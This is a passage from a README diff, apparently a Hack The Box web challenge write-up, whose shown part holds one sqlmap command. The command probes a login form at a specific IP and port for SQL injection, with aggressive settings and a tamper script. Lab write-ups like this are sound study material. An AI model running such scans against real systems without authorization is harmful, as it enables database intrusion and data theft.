PhilipSLuk/security-projects/hackthebox/web/cartographer/README.md

 passed to the server.

 ### SQLMAP - DISCOVERY

+Let's use sql map to see if we can use an SQL injection exploit to discover more about our target..

 ```
 $ sqlmap -u http://88.198.233.174:35067 --method POST --data="username=blah&password=blah" --dbs --batch --tamper=space2comment --level 5 --risk 3
 ```